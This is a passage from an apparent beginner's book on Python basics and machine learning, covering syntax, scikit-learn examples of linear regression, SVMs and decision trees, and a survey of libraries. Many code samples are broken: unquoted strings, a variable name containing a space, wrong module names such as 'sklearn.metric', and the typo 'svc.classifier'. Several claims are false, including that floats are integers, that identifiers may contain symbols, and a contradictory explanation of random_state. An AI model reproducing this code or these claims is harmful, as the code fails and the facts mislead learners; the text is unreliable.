book, we also need to get a good understanding of the Python language and
what it is all about. Different parts show up in the Python coding language,
but knowing some of the basics, as well as, learning some of the power that
comes with Python makes all of the difference on the success that you can get
when you combine this coding language with machine learning.
We have talked briefly about the Python coding language already, as well as
some of the reasons why it may be so beneficial when you want to work with
machine learning. Even though it is considered one of the easier coding
languages to learn how to work with, it has a lot of power and strength that
comes in behind it, which makes it the best option to use whether you are a
beginner or someone who has been coding for quite some time. And since the
Python language does have some of the power of the bigger and more
powerful coding languages, you will be able to do a lot of cool things with
machine learning.
There are going to be a few different parts that come into play when you start
to learn how to work with the Python code even with machine learning. You
can work with the comments, functions, statements, and more. Let’s take a
look at some of the basic parts that come with coding in Python so that we
can do some of these more complicated things together as we progress
through machine learning.
The Comments
The first aspect of the Python coding language that we need to explore is that
of comments. There is going to be some point when you are writing out a
code where you would like to take a break and explain to others and yourself
what took place in the code. This is going to ensure that anyone who sees the
code knows what is going on at one point to another. Working with a
comment is the way that you would showcase this in your project, and can
make it easier for others to know the name of that part, or why you are doing
one thing compared to another.
When you would like to add in some comments to the code, you are going to
have a unique character that goes in front of your chosen words. This unique
code is going to be there to help you tell the computer program that it should
skip reading those words and move on to the next part of the code instead.
The unique character that you are going to use for this one is the # sign in
front of the comments you are writing. When the compiler sees this, it is
going to know that you don’t want that part of the code to execute at all. It
will wait until the next line before it gets started with rereading the code. An
example of a comment that you may see in your code would include:
#this is a new comment. Please do not execute in the code.
After you have written out the comment that you want here, and you are done
with it, you are then able to hit the return button or enter so that you can write
more code that the compiler can execute. You can have the freedom to
comment as long or as short as you would like based on what you would need
in the code. And you can write in as many of these comments as you would
like. It is usually seen as a better option if you keep the comments down to
what you need. Otherwise, it makes the code start to look a little bit messy
overall. But you can technically add in as many of these comments to your
code as you would like.
The Statements
The next part of the code that we need to focus on is the statements. Any time
that you are starting with your new code, whether you are working with
Python or with some other coding language along the way, you must add
these statements inside of the code. This allows the compiler to know what
you would like to happen inside. A statement is going to be a unit of code
that you would like to send to your interpreter. From there, the interpreter is
going to look over the statement and execute it based on the command that
you added in.
Any time you decide to write out the code, you can choose how many
statements are needed to get the code to work for you. Sometimes, you need
to work with one statement in a block of code, and other times, you will want
to have more than one. As long as you can remember that the statements
should be kept in the brackets of your code, it is fine to make the statement as
long as you would like, and include as many statements as you would like.
When you are ready to write your code and add in at least one statement to
your code, you would then need to send it over so that the interpreter can
handle it all. As long as the interpreter can understand the statements that you
are trying to write out, it is going to execute your command. The results of
that statement are going to show up on the screen. If you notice that you write
out your code and something doesn’t seem to show up in it the right way,
then you need to go back through the code and check whether they are
written the right way or not.
Now, this all may sound like a lot of information, but there is a way to
minimize the confusion and ensure that it can make more sense to you. Let’s
take a look at some examples of how this is all going to work for you.
x = 56
Name = John Doe
z = 10
print(x)
print(Name)
print(z)
When you send this over to the interpreter, the results that should show up on
the screen are:
56
John Doe
10
It is as simple as that. Open up Python, and give it a try to see how easy it is
to get a few things to show up in your interpreter.
The Variables
The next things we consider inside our Python codes are the variables. These
variables are important to learn about because they are the part that will store
your code in the right places so you can pull them up later on. This means
that if you do this process in the right way, the variables are going to be
found inside the right spot of the memory in the computer. The data in the
code will help determine which spots of the memory these points will be
stored on, but this makes it easier for you to find the information when it is
time to run the code.
The first thing that we need to focus on here is to make sure that the variable
has a value assigned to it. If there is a variable without a value, then the
variable won’t have anything to save and store. If the variable is given a good
value from the start, then it will behave the way you are expecting when you
execute the program.
When it comes to your Python code, there are going to be three types of
variables that you can choose from. They are all important and will have their
place to work. But you have to choose the right one based on the value that
you would like to attach to that variable. The main variables that are available
for you with Python are going to include:

1. Float: This is going to be an integer variable that includes


numbers like 3.14
2. String: This is going to be one of those statements that you
would write out. You can add in any phrase that you would like
to this one.
3. Whole number: This is going to be any of the other numbers
that you would want to use, ones that are not going to contain a
decimal.
When you are trying to work with the variables in your program, you won’t
have to go through and make a declaration to make sure the memory space is
available. This is something that Python can do for you automatically, as
soon as a value is assigned to a variable. If you would like to make sure that
this is happening in your code and avoid some of the surprises along the way,
you need to double check that the equal sign, the sign of giving a variable
value is in the right place. An excellent example of how this is going to look
when you write out a code includes the following
x = 12#this is an example of an integer assignment
pi = 3.14#this is an example of a floating point assignment
customer name = John Doe #this is an example of a string assignment
In some instances, you may need to have one variable with two or more
values attached to it. There are certain times when you won’t be able to avoid
this and need to make it happen. The good news is that you can work with the
same procedure discussed above to make this happen, you need to make sure
that there is an equal sign to each part so that the compiler knows how to
assign everything. So, when you want to do this, you would want to write out
something like a = b = c = 1.
The Keywords
Any time that you are using the Python language, like what we find in other
coding languages as well, you are going to come across some words that are
reserved as commands in the code, and these are going to be known as
keywords. You need to be careful about the way you use these because they
are there to tell the program some commands, and how you would like it to
behave. You don’t want to bring these and use them in any other place
outside of a particular command.
If you do misuse these keywords, it is going to cause some confusion inside
the code. The interpreter isn’t going to know what to do, and the computer
may get stalled in what it needs to do. As we go through this guidebook some
more and develop a few Python codes for machine learning, we will start to
recognize some of the most common keywords that you need to watch out
for.

Naming Your Identifiers


The next thing that we need to focus on is how to name all of the identifiers.
You need to do this in a way that makes sense, and will not confuse the
computer along the way. Any time that you are writing out a particular code
in Python, you are going to have at least a few identifiers that show up. Some
of the most common of these identifiers are going to including classes,
entities, variables, and functions.
At one point or another, you will need to name out the identifiers so that they
are more likely to work in the way that they should and make it easier for the
compiler to pull them up when it is time to execute the code. No matter
which of the four identifiers that you use, the rules for naming are going to be
the same, which can make it easier when you get started. Some of the rules
you should remember when naming your identifiers include:
Any time that you are using letters, it is fine to use either upper case or lower
case, and a combination of both is fine as well. You can also add in numbers,
symbols, and an underscore to the name. Any combination of these are
acceptable, make sure that there are no spaces between the characters of the
name.
Never start the name of one of your identifiers with a number. This means
that writing out the name of 4babies would result in an error on your
computer. However, it is acceptable to name an identifier “fourbabies” if you
would like.
The identifier should never be one of the Python keywords, and the keyword
should not appear in the name at all.
Now, if you are trying to go through and write out a few of your codes along
the way, and you don’t follow all of the rules that are above, you will confuse
the compiler, and it will send you an error message to let you know
something is wrong. The error will then be on your computer, and the
program will close out because it doesn’t know how to proceed. This is
something that you don’t want to happen, so be careful when naming these
identifiers.
Another thing to remember with these identifiers and naming them is that you
want to make sure that you are picking out names that are ready for you to
remember. And picking out names that are easy to understand and read will
make it easier if another programmer comes in, and is trying to look through
the code as well.
What Else Do I Need to Know About the Python Coding Language?
The Python coding language is often considered to be one of the best
languages for programming by the experts, and this is even truer if you are
someone who has never worked with coding in the past. This language is
simple, it has plenty of power, and there are a lot of the tools and the
resources that are needed to help you work on your project, even if that
project has to do with machine learning. While there are other options that
you can use with machine learning, those are often a bit more difficult to
work with, and Python is often the better choice.
One thing that you will like when you first start working with the Python
language is that the whole thing is based on the English language. What this
means is that you will recognize the words and what they mean, rather than
trying to guess. And even though it is a language that is great for beginners
who have never worked with coding before, it is going to be strong enough to
work with machine learning and any other topic that you would like.
As someone ready to learn and get started with the Python language, you will
notice that it has a nice big library available that you can utilize when you are
coding. And this library is going to have the tools and the resources that you
need, making it easier for beginners and experts alike to write out any code
that they need.
Chapter 8 Machine Learning Algorithms
Now that you understand the concept of machine learning and you’ve
assembled all of your tools, it’s time to start exploring the most powerful
algorithms. Keep in mind that while you will learn about each algorithm and
technique individually, they are rarely used like this in a real world scenario.
When dealing with complex datasets you will often combine supervised
machine learning techniques with unsupervised machine learning techniques,
as well as a number of other processes.
In this chapter we are going to focus on a number of algorithms that work
well separately when working with ideal data sets, and even better when
combined to achieve high accuracy and efficiency. Some of the algorithms
we’ll explore include linear regression, decision trees, and support vector
machines.
Linear Regression
Many machine learning problems, such as prediction analysis, are handled
using linear regression. This technique is powerful in predicting an outcome
with high accuracy as long as the training data is valuable and doesn’t contain
too much noise. Keep in mind that this is why you need to perform data pre-
processing, to clear out some of the noise and outliers that can affect the
results.
One of the characteristics of linear regression is calculating the prediction
value based on independent variables. In other words, you should opt for this
algorithm whenever you have to calculate the link between a number of
variables. However, take note that linear regression can only handle
regression problems, and not classification problems. There are other
algorithms for that.
Now let’s see an example on how to apply linear regression using Scikit-
learn and an open source dataset. We will use the Scikit library because it
contains a number of machine learning specific algorithms, as well as certain
public datasets. One such dataset is the Boston housing market dataset, which
is well-documented and clean. In order to use linear regression efficiently, we
will divide the whole set into a training set (80%) and a testing set (20%).
Let’s get to work:
from sklearn.datasets import load_boston
boston = load_boston()
from sklearn.cross_validation import train_test_split
X_train, X_test, Y_train, Y_test = train_test_split(boston.data,
boston.target, test_size=0.2, random_state=0)
As you can see, the Python code is easy to read and quite understandable
without much explanation. We have imported our dataset and have performed
a split in order to obtain a training set and a test set. The splitting function is a
perfect example of the tools that the Scikit-learn library contains. You will
notice that we have declared the percentages by stating the target test dataset
should have a value of 0.2. This means that it will contain 20% of the data.
Furthermore, we have a random state parameter which is needed to define the
value which will handle the random number generating during the split.
Basically, it randomly selects the data that will be categorized as training data
or testing data.
In the next phase, we need to apply a regressor in order for our linear
regression algorithm to make an accurate prediction. Once it’s implemented
all we need to do is measure the results to see how it performed. Keep in
mind that there are many factors that can influence the accuracy, such as
random errors, mislabeled data, outliers, noise, and so on. That is why the
pre-processing you perform is rarely enough, and you will have to apply
other algorithms to improve the result. This is something you need to keep in
mind for the near future when you practice on your own. Now let’s see our
regressor and the results we obtain:
In: from sklearn.linear_model import LinearRegression
regression = LinearRegression()
regression.fit(X_train, Y_train)
Y_pred = regression.predict(X_test)
from sklearn.metrics import mean_absolute_error
print ("MAE", mean_absolute_error(Y_test, Y_pred))
Out: MAE 3.9318708224346
That’s it! As you can see linear regression is easy to implement as long as
you use Scikit-learn to lessen the burden. The result we obtained, however,
while not bad, is not exactly good either. It shows that even when we have
fairly clean data, there is always room for improvement with other algorithms
and techniques. Furthermore, whenever you have to make a choice between
machine learning algorithms, you will actually be balancing prediction
accuracy with speed. In essence, it comes down to those two factors.
Whenever you opt for one, the other one is sacrificed. With time and
experience you will learn how to balance them based on the type of data you
are working with and what kind of results you need to obtain.
Now, let’s see another type of algorithm, namely the support vector machine.

Support Vector Machines


If you need a versatile algorithm that can handle nearly everything for you,
then a support vector machine is precisely what you’re looking for. While the
linear regression algorithm is only used for regression problems, support
vector machines can handle both regression, as well as classification, and
even the detection of outliers. This technique is one of the foundational
algorithms every machine learner needs to study and learn how to implement.
Support vector machines are popular because they are powerful without
being resource intensive. Usually, the more you push for accuracy, the slower
the data processing will go because it will require more from your computer
system. However, support vector machines require a lot less power without
affecting the prediction accuracy. Furthermore, you can use this algorithm to
also clean most of the noise within the dataset, thus reducing the amount of
steps you need to perform during the pre-processing phase (though it’s still
advisable to perform all of them).
So why are support vector machines so important? Where are they used?
Because of their power and versatility they are implemented in a variety of
fields. For instance, they are used for facial recognition software, text
classification, handwriting recognition, and in the medical industry as well
for classifying genes. There are many more uses for this algorithm because it
separates the data points within the dataset with great efficiency and that
allows for accurate enough results to make it usable in complex applications.
We will go through an example to see how a support vector machine is
implemented and how it works. Keep in mind that you will again have to
make use of the Scikit-learn library in order to reduce the time it takes to
implement the algorithm. As you can see, this tool is irreplaceable whether
you’re interested in machine learning, data science, or even data mining.
With that being said, we will use a support vector machine in order to predict
how valid a banknote is. This implies image classification, and this algorithm
is ideal for this process. The algorithm implementation will be simple
because the classification will be binary. All we need to establish is whether a
banknote is authentic or fake, therefore true or false.
Take note that we will have a number of attributes that describe the banknote.
In addition, we need to establish the separation line between the two
dimensions in order to avoid any miss-classifications. While other
classification algorithms can perform the same process, support vector
machines have a unique approach. This technique determines the decision
limit by calculating the maximum distance between certain data points that
are in close proximity to every single class. The decision limit needs to be
optimal and therefore we cannot just randomly select it. These optimal data
points are known as support vectors, hence the name of our algorithm. Keep
in mind that they are a mathematical concept and we will not dig too deep
into how they are calculated and so on. At this stage you don’t need to know
the core details that lie in fairly complex algebra.
Now, let’s see a practical example on how to apply a support vector machine
that does everything we discussed. For this demonstration you will need to
use several libraries and packages. Here’s the code:
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
dataset = pd.read_csv (“bank_note.csv”)
print (dataset.shape)
The shape function is used to extract some information about the dataset.
Namely, it tells us how many rows and columns we have. For the purpose of
this exercise we are interested only in the first 5 rows (out of over 1,300).
Now type the following line to see the result:
print (dataset.head())
VarianceSkewnessCurtosisEntropyClass
03.621608.6661-2.8073-0.446990
14.4545908.1674-2.4586-1.462100
23.86600-2.63831.92420.106450
33.456609.5228-4.0112-3.594400
40.32924-4.45524.5718-0.988800
The columns represent the attributes namely the variance, skewness and so
on. Now we can start processing this information in order to start building
our training and testing sets. However, first we need labels:
x = dataset.drop (‘Class’, axis = 1)
y = dataset [‘Class’]
The first command instructs the system to store every column into a variable.
The only exception is the class column and that is why we use the drop
function in order to drop it. The reason we did so is because we want to store
it separately in another variable, and that is what we do with the second
command. Now we have the dataset attributes inside “x” and the labels inside
“y”. This is the first processing step, separating the attributes from the labels.
The next phase involves the data separation in order to create our train and
test sets. Simply use the function you used earlier for linear regression to
perform this step, namely train_test_split. The breakdown should respect the
same ratio as before.
Next, we will train the support vector machine, however, first we need to
import it from the Scikit-learn library, otherwise we do not have any access to
the algorithm or any of its components. Let’s see the code:
from sklearn.svm import SVC
svc_classifier = SVC (kernel = ‘linear’)
svc_classifier.fit (x_train, y_train)
Now let’s see the prediction with the help of the test data:
pred_y = svc.classifier.predict(x_test)
We’re almost done. All we need to do now is to see how accurate the
prediction is. In the case of the support vector machine we will have to apply
what is known as a confusion matrix, which holds a number of metric, such
as precision, recall, and a few others. While the name of the confusion matrix
might sound confusing, you should know that it is a basic table that contains
information about the performance of the data classification process. It will
list the positive and negative cases, as well as the false positive and negative
cases. These metrics are then used to establish the final accuracy result.
Here’s how it all looks in code:
from sklearn.metric import confusion_matrix
print (confusion_matrix (y_test, pred_y)
This is how the results will look:
[[1601]
[1113]]
Accuracy Score: 0.99
Let’s also see the detailed report:
from sklearn.metrics import classification_report
print (classification_report(y_test, y_pred))
These are the final results:
precisionrecallf1-scoresupport
0.00.990.990.99161
1.00.990.990.99114
avg / total0.990.990.99275
As you can see from these numbers, the support vector machine has
performed magnificently well because we managed to obtained a 0.99
accuracy value without applying any other algorithms or data-preprocessing
techniques. This is why support vector machines are used in so many
technical fields that require pin-point accuracy.
Next up, you are going to take a look at another powerful algorithm called a
decision tree.
Decision Trees
Decision trees, just like support vector machines, are incredibly versatile
because they can perform both regression and classification operations. This
means they are extremely useful when working with large datasets and you
should get acquainted with them. Furthermore, decision trees form the basis
of another type of machine learning algorithm known as an ensemble
method, particularly the one known as a random forest. It’s all fairly logical.
If you have a lot of decision trees they form a forest, right?
As the name suggests, decision trees are used to model decisions, including
the determination of any kind of consequences and system resources needed
for the entire process. In addition, everything is presented visually in a graph.
In other words, as a result you will have a flowchart that contains every test
you perform. For instance, let’s say you flip a coin a certain number of times.
Every time the results will be recorded and you will have a number of tree
branches that represent them, together with the leaves that represent class
labels.
This supervised machine learning algorithm is considered to be one of the
most powerful ones because it offers accurate results without sacrificing too
much efficiency or requiring too many resources from your system.
Furthermore, the graph system allows you to easily interpret the data and
therefore make adjustments as needed instead of going through another
tedious process that would achieve the same thing but with a lot more work.
With that being said, let’s discuss all the other advantages provided by
decision trees:

1. User-friendly: Unlike many other algorithms or techniques,


decision trees are logical even to those without significant
machine learning or mathematical knowledge and experiences.
You don’t need to be a data scientist to start working with
them. They follow a simple, programming-like structure,
similar to Python’s conditional operations. A decision tree
follows the “if this, then do that, else do this” logic.
Furthermore, the results are clear and do not require even a
fundamental knowledge of statistics in order to interpret them.
That is the benefit of having an inbuilt graph that clearly
explains the data you are analyzing.
2. Clean data: Clean data yields accurate results. Therefore, no
matter which algorithm you use you always have to eliminate
as much noise and as many outliers as you can by using certain
methods and techniques. However, the benefit of using
decision trees is that they are barely affected by these factors.
Outliers and noise will only be a minor inconvenience and you
will often be able to ignore them completely and still achieve
an accurate result.
3. Versatile: As you already know, certain machine learning
algorithms are designed to work only with certain data types.
Some of them can only be applied to categorical data, while
others are specifically used on numerical data. Often for this
reason they need to be combined when working with complex
datasets that contain both types of information. However,
decision trees can handle the training process for both data
type, therefore significantly reducing your workload.
4. Exploring data: Data exploration is a valuable step that can be
time consuming because you need to identify the most valuable
data points and then establish a connection between them.
Decision trees, however, excel at exploratory analysis and you
will spend a lot less time performing this step. In addition, you
will be able to create new features a lot more efficiently in
order to boost the accuracy of the predictions even further.
Exploring data can be exhausting because in the real world you
will often deal with thousands of variables and finding the most
important ones can be difficult without the appropriate tool.
Now that you have an idea about decision trees and why they are a preferred
algorithm amongst machine learners, you should also learn which
disadvantages they bring. Keep in mind there is no such thing as the perfect
algorithm, so let’s see what kind of difficulties you will be facing when
working with decision trees:

1. Overfitting: This is probably the biggest problem you will face.


Decision trees tend to exaggerate and build overly complex
decision trees that can’t perform accurately on general data.
However, the issue of overfitting isn’t only found in this case.
Many algorithms have to deal with it. The easiest solution you
can deploy to limit the risk of overfitting is the application of
parameter limitations.
2. Categorization: When your data set has a large number of
continuous numerical variables, decision trees will encounter
difficulty when it comes to categorizing them. Information is
often lost during this process. Take note that continuous
variables are considered to be anything with a value that is
specifically defined between a certain minimum and maximum.
For instance, let’s say that we have some data which specifies
that only people between 21 and 45 can join the military. The
age variable is considered to be continuous because we have set
limits.
3. Picky algorithms: The algorithm doesn’t always choose the
most accurate and efficient decision tree from which you draw
your conclusion. This is simply the nature of the technique.
However, the solution is simple. All you need to do is train
multiple trees in order to sample a larger number of features
randomly and find the most accurate solution.
You learned earlier in this section that decision trees are used to perform
regression tasks, as well as classification tasks. However, this doesn’t mean
that you use the identical method for both tasks. You need to split the
decision trees into two different categories, namely the regression trees and
classification trees. The basics are still the same for both categories, however,
there are a number of differences you should be aware of:

1. Regression trees are specifically applied for tasks that involve


continuous dependent variables. At the same time classification
trees are needed when dealing with categorical dependent
variables.
2. The values that we extract as the result from the training data
are determined differently for each category of decision trees.
In the case of classification trees the value is calculated as the
mode value of the total observation. This means that if we have
an unknown data observation, we can predict with the help of
the mode value. Keep in mind that mode values are the values
that we find the most frequently in a given set of values. On the
other hand, regression trees extract the value from the training
data in the form of the mean of the total observations. This
mean value is then used to calculate any missing data
observations.
3. Regression and classification trees rely on binary splitting. This
concept involves going from the top of the tree to the bottom.
This means that when we have observations in one region of
the tree, there are a number of branches below it that are
divided. The division happens within the predictor space. This
concept is also often referred to as greedy because the
algorithm seeks the variable that is needed for the current split
that is being analyzed. The operation does not take any future
splits in consideration and that is why sometimes we don’t have
the most accurate results. This issue needs to be taken into
consideration in order to counteract its effects with various
methods and create a better decision tree.
Now let’s discuss more about the concept of splitting and see where it occurs.
Splitting directly affects the accuracy of the decision trees. This means that if
we are applying a number of algorithms on a decision tree, they will all affect
the way a data node is divided into a number of subnodes. At this time you
should keep in mind the differences between the two decision tree categories.
The subnodes that are created as a result of splitting will maintain some form
of uniformity. In addition, the node splitting is performed on every variable,
however only the most uniform subnodes are selected. This process involves
some mathematics and we will not dig deeper into the details. It’s enough to
understand the theory behind the process in order to start building the
decision trees. With that being said, let’s see how to work with them in an
application.
Decision Trees in Practice
In order to create the decision trees you need to start from the root node.
Once you access that data you can select a certain attribute and then perform
a logical test on it. As a result you will be able to branch out from the
outcome to any subsets of data that lead to a desirable result from a child
node. You will need to perform recursive splitting on these child nodes in
order to clean up the leaves and keep only the near-perfect ones. These leaves
will represent the data samples that come from the same class. In addition,
you might consider pruning the trees in order to eliminate the excess sub-
sections of the trees which do not lead to any boosts in accuracy. This is one
of the purposes of the splitting process. Once it is complete you can choose
the most optimal split and the most useful feature.
Now let’s finally stop with the theory and start looking at the practical
application. We are going to create a decision tree. For the purpose of this
demonstration we will need Scikit-learn once again because we will be using
another public dataset called Iris. Let’s start by importing everything you
need.
%matplotlib inline
import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
from sklearn.model_selection import train_test_split
from sklearn.tree import DecisionTreeClassifier
df = pd.read_csv(‘Iris.csv’)
df.isnull().any()
After importing everything we have also performed a null value check with
the help of the last line. Once we determine that no values are absent we can
start examining the information. As always, the first step is learning about the
variables and values by reading a summary analysis of the dataset. Once you
know what you’re up against we can start looking at the connections between
the columns. To do this check we have imported the seaborn module because
it provides us with a tool called “pairplot”. This tool is in fact a function that
plots the connections and makes it much easier for us to visualise them. At
this point you can use a certain color for each column. For instance, you can
manipulate the hue for the species section in order to find any outliers in that
category. Here’s how you can do this with Python code:
sns.pairplot(df, hue = ‘Species’)
If you decided to use this particular dataset, you will notice that we do have a
number of outliers, but they aren’t dominating. They may be the result of
unknown anomalies or some faulty data that snuck in. Take note that these
datasets you are working with are extremely clean when compared to real
world data. Most data contains a great deal of noise and outliers and you have
to thoroughly clean them. For now, we can ignore the outliers because they
aren’t prevalent enough to disturb our results significantly.
The next step is to divide the dataset into a training and a test set with the
same method we used before. However, now that we’re working with
decision trees we will change the split to a 70 to 30 ratio instead of the usual
80 to 20. Let’s examine the code:
all_inputs = df [[‘SepalLengthCm’, ‘SepalWidthCm’, ‘PetalLengthCm’,
‘PetalWidthCm’]].values
all_classes = df [‘Species’].values
(train_inputs, test_inputs, train_classes, test_classes) =
train_test_split (all_inputs, all_classes, train_size = 0.7, random_state = 1)
You will notice that the random state parameter is no longer set to 0 in order
to guarantee a random distribution. This time we want to make sure the the
split is performed identically no matter how many times we perform it. This
way we will always be able to recreate the dataset if needed. Now let’s apply
the decision tree classifier:
dtc = DecisionTreeClassifier()
dtc.fit (train_inputs, train_classes)
dtc.score (test_inputs, test_classes)
The result should look something like this:
0.95555555
We have managed to obtain 95% accuracy, which is quite an excellent result
considering that we haven’t performed any cleaning and we decided to ignore
the outliers. This is why decision trees are so powerful and therefore popular
in training various models. You can achieve high accuracy without
performing too many operations.
Chapter 9 Essential Libraries for Machine
Learning in Python
Many developers nowadays prefer the usage of Python in their data analysis.
Python is not only applied in data analysis but also statistical techniques.
Scientists, especially the ones dealing with data, also prefer using Python in
data integration. That's the integration of Webb apps and other environment
productions.
The features of Python have helped scientists to use it in Machine Learning.
Examples of these qualities include consistent syntax, being flexible and even
having a shorter time in development. It also can develop sophisticated
models and has engines that could help in predictions.
As a result, Python boasts of having a series or set of very extensive libraries.
Remember, libraries refer to a series of routines and sorts of functions with
different languages. Therefore, a robust library can lead to tackling more
complex tasks. However, this is possible without writing several code lines
again. It is good to note that Machine Learning relies majorly on
mathematics. That's mathematical optimization, elements of probability and
also statistical data. Therefore, Python comes in with a rich knowledge of
performing complex tasks without much involvement.
The following are examples of essential libraries being used in our present.
Scikit – Learn
Scikit learn is one of the best and a trendy library in Machine Learning. It has
the ability to supporting learning algorithms, especially unsupervised and
supervised ones.
Examples of Scikit learn include the following.

k-means
decision trees
linear and logistic regression
clustering
This kind of library has major components from NumPy and SciPy. Scikit
learn has the power to add algorithms sets that are useful in Machine
Learning and also tasks related to data mining. That's, it helps in
classification, clustering, and even regression analysis. There are also other
tasks that this library can efficiently deliver. A good example includes
ensemble methods, feature selection, and more so, data transformation. It is
good to understand that the pioneers or experts can easily apply this if at all,
they can be able to implement the complex and sophisticated parts of the
algorithms.
TensorFlow
It is a form of algorithm which involves deep learning. They are not always
necessary, but one good thing about them is their ability to give out correct
results when done right. It will also enable you to run your data in a CPU or
GPU. That's, you can write data in the Python program, compile it then run it
on your central processing unit. Therefore, this gives you an easy time in
performing your analysis. Again, there is no need for having these pieces of
information written at C++ or instead of other levels such as CUDA.
TensorFlow uses nodes, especially the multi-layered ones. The nodes perform
several tasks within the system, which include employing networks such as
artificial neutral, training, and even set up a high volume of datasets. Several
search engines such as Google depend on this type of library. One main
application of this is the identification of objects. Again, it helps in different
Apps that deal with the recognition of voice.

Theano
Theano too forms a significant part of Python library. Its vital tasks here are
to help with anything related to numerical computation. We can also relate it
to NumPy. It plays other roles such as;

Definition of mathematical expressions


Assists in the optimization of mathematical calculation
Promotes the evaluation of expressions related to numerical
analysis.
The main objective of Theano is to give out efficient results. It is a faster
Python library as it can perform calculations of intensive data up to 100
times. Therefore, it is good to note that Theano works best with GPU as
compared to the CPU of a computer. In most industries, the CEO and other
personnel use Theano for deep learning. Also, they use it for computing
complex and sophisticated tasks. All these became possible due to its
processing speed. Due to the expansion of industries with a high demand for
data computation techniques, many people are opting for the latest version of
this library. Remember, the latest one came to limelight some years back. The
new version of Theano, that’s, version 1.0.0, had several improvements,
interface changes and composed of new features.
Pandas
Pandas is a library that is very popular and helps in the provision of data
structures that are of high level and quality. The data provided here is simple
and easy to use. Again, it’s intuitive. It is composed of various sophisticated
inbuilt methods which make it capable of performing tasks such as grouping
and timing analysis. Another function is that it helps in a combination of data
and also offering filtering options. Pandas can collect data from other sources
such as Excel, CSV, and even SQL databases. It also can manipulate the
collected data to undertake its operational roles within the industries. Pandas
consist of two structures that enable it to perform its functions correctly.
That's Series which has only one dimensional and data frames that boast of
two dimensional. Pandas has been regarded as the most strong and powerful
Python library over the time being. Its main function is to help in data
manipulation. Also, it has the power to export or import a wide range of data.
It is applicable in various sectors, such as in the field of Data Science.
Pandas is effective in the following areas:

Splitting of data
Merging of two or more types of data
Data aggregation
Selecting or subsetting data
Data reshaping

Diagrammatic explanations
Series Dimensional
A7
B8
C9
D3
E6
F9

Data Frames dimensional


A B C D
*0 0 0 0 0
*1 7 8 9 3
*2 14 16 18 6
*3 21 24 27 9
*4 28 32 36 12
*5 35 40 45 15

Applications of pandas in a real-life situation will enable you to perform the


following:

You can quickly delete some columns or even add some texts
found within the Dataframe
It will help you in data conversion
Pandas can reassure you of getting the misplaced or missing
data
It has a powerful ability, especially in the grouping of other
programs according to their functionality.
Matplotlib
This is another sophisticated and helpful data analysis technique that helps in
data visualization. Its main objective is to advise the industry where it stands
using the various inputs. You will realize that your production goals are
meaningless when you fail to share them with different stakeholders. To
perform this, Matplotlib comes in handy with the types of computation
analysis required. Therefore, it is the only Python library that every scientist,
especially the ones dealing with data prefers. This type of library has good
looks when it comes to graphics and images. More so, many prefer using it in
creating various graphs for data analysis. However, the technological world
has completely changed with new advanced libraries flooding the industry.
It is also flexible, and due to this, you are capable of making several graphs
that you may need. It only requires a few commands to perform this.
In this Python library, you can create various diverse graphs, charts of all
kinds, several histograms, and even scatterplots. You can also make non-
Cartesian charts too using the same principle.

Diagrammatic explanations

The above graph highlights the overall production of a company within three
years. It specifically demonstrates the usage of Matplotlib in data analysis.
By looking at the diagram, you will realize that the production was high as
compared to the other two years. Again, the company tends to perform in the
production of fruits since it was leading in both years 1 and 2 with a tie in
year 3. From the figure, you realize that your work of presentation,
representation and even analysis has been made easier as a result of using this
library. This Python library will eventually enable you to come up with good
graphics images, accurate data and much more. With the help of this Python
library, you will be able to note down the year your production was high,
thus, being in a position to maintain the high productivity season.
It is good to note that this library can export graphics and can change these
graphics into PDF, GIF, and so on. In summary, the following tasks can be
undertaken with much ease. They include:

Formation of line plots


Scattering of plots
Creations of beautiful bar charts and building up of histograms
Application of various pie charts within the industry
Stemming the schemes for data analysis and computations
Being able to follow up contours plots
Usage of spectrograms
Quiver plots creation
Seaborn
Seaborn is also among the popular libraries within the Python category. Its
main objective here is to help in visualization. It is important to note that this
library borrows its foundation from Matplotlib. Due to its higher level, it is
capable of various plots generation such as the production of heat maps,
processing of violin plots and also helping in generation of time series plots.

Diagrammatic Illustrations

The above line graph clearly shows the performance of different machines
the company is using. Following the diagram above, you can eventually
deduce and make a conclusion on which machines the company can keep
using to get the maximum yield. On most occasions, this evaluation method
by the help of the Seaborn library will enable you to predict the exact abilities
of your different inputs. Again, this information can help for future reference
in the case of purchasing more machines. Seaborn library also has the power
to detect the performance of other variable inputs within the company. For
example, the number of workers within the company can be easily identified
with their corresponding working rate.
NumPy
This is a very widely used Python library. Its features enable it to perform
multidimensional array processing. Also, it helps in the matrix processing.
However, these are only possible with the help of an extensive collection of
mathematical functions. It is important to note that this Python library is
highly useful in solving the most significant computations within the
scientific sector. Again, NumPy is also applicable in areas such as linear
algebra, derivation of random number abilities used within industries and
more so Fourier transformation. NumPy is also used by other high-end
Python libraries such as TensorFlow for Tensors manipulation. In short,
NumPy is mainly for calculations and data storage. You can also export or
load data to Python since it has those features that enable it to perform these
functions. It is also good to note that this Python library is also known as
numerical Python.
SciPy
This is among the most popular library used in our industries today. It boasts
of comprising of different modules that are applicable in the optimization
sector of data analysis. It also plays a significant role in integration, linear
algebra, and other forms of mathematical statistics.
In many cases, it plays a vital role in image manipulation. Manipulation of
the image is a process that is widely applicable in day to day activities. Cases
of Photoshops and much more are examples of SciPy. Again, many
organizations prefer SciPy in their image manipulation, especially the
pictures used for presentation. For instance, wildlife society can come up
with the description of a cat and then manipulate it using different colors to
suit their project. Below is an example that can help you understand this more
straightforwardly. The picture has been manipulated:

The original input image was a cat that the wildlife society took. After
manipulation and resizing the image according to our preferences, we get a
tinted image of a cat.
Keras
This is also part and parcel of Python library, especially within Machine
Learning. It belongs to the group of networks with high level neural. It is
significant to note that Keras has the capability of working over other
libraries, especially TensorFlow and even Theano. Also, it can operate
nonstop without mechanical failure. In addition to this, it seems to work
better on both the GPU and CPU. For most beginners in Python
programming, Keras offers a secure pathway towards their ultimate
understanding. They will be in a position to design the network and even to
build it. Its ability to prototype faster and more quickly makes it the best
Python library among the learners.
PyTorch
This is another accessible but open source kind of Python library. As a result
of its name, it boasts of having extensive choices when it comes to tools. It is
also applicable in areas where we have computer vision. Computer vision and
visual display play an essential role in several types of research. Again, it aids
in the processing of Natural Language. More so, PyTorch can undertake
some technical tasks that are for developers. That's enormous calculations
and data analysis using computations. It can also help in graph creation which
mainly used for computational purposes. Since it is an open-source Python
library, it can work or perform tasks on other libraries such as Tensors. In
combination with Tensors GPU, its acceleration will increase.
Scrapy
Scrapy is another library used for creating crawling programs. That's spider
bots and much more. The spider bots frequently help in data retrieval
